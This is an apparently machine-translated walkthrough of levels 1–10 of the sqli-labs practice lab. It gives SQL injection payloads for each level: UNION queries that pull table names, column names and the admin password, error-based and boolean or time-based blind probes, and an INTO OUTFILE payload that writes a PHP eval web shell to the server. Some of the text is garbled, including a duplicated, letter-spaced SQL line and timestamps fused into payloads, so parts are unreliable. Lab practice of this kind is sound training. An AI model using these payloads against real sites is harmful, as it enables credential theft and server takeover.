【Shooting Range Clearance】sqli-labs less1-10


Prompt to use ID=number as input parameter



Add a'test. The SQL syntax error is directly displayed, indicating that this is an injection point.


id Although the input is a numeric value, look at the source code here or try id=1' and 1=1 --+ and 'and 1=2 --+ The results are different


s q l = " S E L E C T ∗ F R O M u s e r s W H E R E i d = ′ sql="SELECT * FROM users WHERE id=' s q l=" S E L E C T∗F R O M u s e r s W H E R E i d=′id' LIMIT 0,1";




First find the injection point, and then guess the field. The
most direct way is to directly execute the complete statement through our input statement, which saves trouble. The common method is the union joint query.
But the joint query must know the field name or Number of fields. We don't know the name of the field. Compared with blasting the field name, guessing the number of fields is more efficient.
id=1'union select 1,2,3–+ where the number of select represents the number of fields. If the number of fields is correct,
it will be displayed normally, otherwise the internal display The used SELECT statements have a different number of columns



Of course, you can also use the sorting function order by 字段序列号to guess how many fields the current table has. Reused in union,
we know that there are 3 by trying A field. Next, we need to know that there is an echo bit, which are the fields to be displayed.
In fact, one echo bit is enough

Use id=-1 instead of id=1 so that the query statement before union will not produce results, and the first row of the result set will be the query result after union

id=-1' union select 1,2,4--+


For fields that do not know the data type, null NULL can be used instead, such as: id=-1' union select null,null,null--+

Some details of different versions of mysql are different. When
MySQL version is less than 4.0, union select is not
supported. When MySQL version is more than 5.0, there is a default database information_schema, which saves all the database information of Mysql, such as database name, table name, and field information. Name and data type and access authority, etc. The database has a data table named tables, which contains two fields, table_name and table_schema, which record the stored table name in the DBMS and the database where the table name is located.

Get data/information
Check the current database and database user name
-1' union select 1,database(),user()


#Check the current database version and operating system
-1' union select 1,version(),@@version_compile_os-- +The


conventional idea is that the closed digital type does not need to consider the problem of closure.
The character type should consider the closed search type of quotation marks' or "may be% closed, and others may still exist); etc.
Repeat the above steps, we know that the current database is security; pay attention to table_schema= for the character type to be caused by ``, otherwise the syntax error Display
Check the table name of the current library (known library name is security)
#-1' union select 1, table_name,table_schema from information_schema.tables where table_schema ='security' --+
-1' union select 1, group_concat(table_name) ,table_schema from information_schema.tables where table_schema ='security' --+

group_concat can combine the table names belonging to the table_name table into one row to display >

Check the column names of a table (the table is known as user)
-1' union select 1, 2, group_concat(column_name) from information_schema.columns where table_name='users '--+
group_concat can combine the column names belonging to the users table into one line to display >


check the value of a certain column in a table (known table name users column name username)
-1' union select 1, group_concat(username), 3 from users --+
-1' union select 1, group_concat(username),password from users where username='admin'--+


Several methods of mysql comment

#Single line comment
--Space MySQL single-line comment method two commonly used + replace spaces --+ oracle no spaces

id=1' and (length (database()))>3–+



Access prompt get id a value as a parameter
? id=1 shows normal.


Try' to report sql error indicating that there is an injection point here.
Try 'and 1=1 --+ and' and 1=2 --+ both show SQL Syntax syntax error.
Try and 1=1–+ Normal and and 1=2–+ No display and no error, indicating that the syntax of the statement is correct. Just no data.
It can be judged that this is a digital injection point. This type of injection point does not need to be considered to be closed, which is simpler and more convenient.
The first lesson already knows the general field structure of the database. Here just save some steps and directly union

Number of confirmation fields union select 1,2,3--+ Normal display union select 1,2,3 ,4–+ SQL error, The used SELECT statements have a different number of columns
indicating that the number of fields is 3

View echo bit

Change id to -1 to invalidate the query before union. Use union select to see which fields can be displayed. union select 1,2,3–+


View the current database name


Learned that the former database was named security

View the name of the table that exists in the current database union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security' --+


View the column names of a table union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+


-1 union select 1, group_concat(username) ,password from users'


-1 union select 1,group_concat(username) ,password from users where username='admin'




use near''1'') LIMIT 0,1' at line 1
Pay attention to the error report indicating that there is an original SQL statement and another) What is the
difference between the old routines and observations
? id=1' reports SQL syntax error, indicating that there is an injection point
?id=1and 1=2–+ and ?id=1and 1=1–+ are displayed normally, indicating that the non-digital type
?id=1'and 1=2–+ and ?id=1'and 1=1–+ are both The display syntax error may be a closing problem.
Combine the error report of'Try to add) Close')–+ Normal display indicates that the closing is successful.
Refer to the previous less-l less-2 to get') union select 1,2,3--+

20210504121416 id=-1') union select 1, group_concat(username) ,password from users where username='admin'–+



The old routine?id=1' is found to be an error, and
and'and are also normal. If' is normal,


it may be considered that there is no injection point. But we know that there must be an injection point, and we suspect that it may have been filtered or replaced by some kind of filtering.
Try "and found an error right syntax to use near'"1"") LIMIT 0,1' at line 1


See the ID should be closed with double quotes ") union select 1,2,3 --+

20210504122656") union select 1,username,password from users where username='admin'–+



right syntax to use near''1'' LIMIT 0,1' at Line 1 indicates that there is an injection point, and'–+ should be able to close'–+


can indeed be closed,
try id=1 id=2 and it will show You are in... That is to say, there is no echo, and there is no relevant information when looking up the HTML response. It is estimated that the test site is a blind injection
attempt.'id=1 and 1=1–+ Normal display and'id=1 and 1=2–+ No display indicates that the characters are stored Boolean type Injection.
?id=1' and length(“abc”)=2–+
?id=1' and length(“abc”)=3–+' union select 1,count(*), concat((select database()),":", floor(rand()*2))as a from information_schema.tables group by a–+' union select 1,count(*), concat((select password from users where username='admin' limit 0,1),":", floor (rand()*2))as a from information_schema.tables group by a–+



Same as less-5'change"



/?id=1' Report a grammatical error directly, but it is an error that has been abnormally handled.
There is no possible closing character in the error report




Closing is successful. The
current problem is that the queried data has no display bits, so you can't see the result directly like looking at the result through a statement,

20210504162941')) union select 1,2,3 into outfile "/var/lib/mysql/abcd.php"–+ Attempt to write to the file.
Note the select after id=-1 nunion')) union select 1,"<?php @eval($_POST['chopper']);? >",3 into outfile "/var/lib/mysql/123456.php" --+
Then go to the local folder to check whether the file is written successfully. Note that the writing here is successful but there is still a syntax error on the page.


The path under windows \ Note the use of \ to change the meaning.
Note that when using the database file permission to write a file to the operating system, the file with the same file name cannot be overwritten, so if you Upload chao.php once, and upload chao.php next time, the command is invalid, that is, the content in the new chao, php will not be overwritten, the previous chao.php

Less-8' union select 1,"<?php @eval($_POST['chopper']);?>",3 into outfile “/var/lib /mysql/1234567.php" --+



Try id=1 id=2 id=-1 id=1 id=" id=1'–+ id=1" --+ are displayed as the same page.
Guessing may only return the Boolean type of blind note on this page. Method judgment. Try time-based injection' and sleep(5)–+The


time injection efficiency is the lowest, and the delay of the network may also lead to misjudgment.
There are judgment points that can be combined with the interception character function to enumerate the data bit by bit.

Less-10" and sleep(5)–+
Similar to less-9, but the closing symbol is not "为"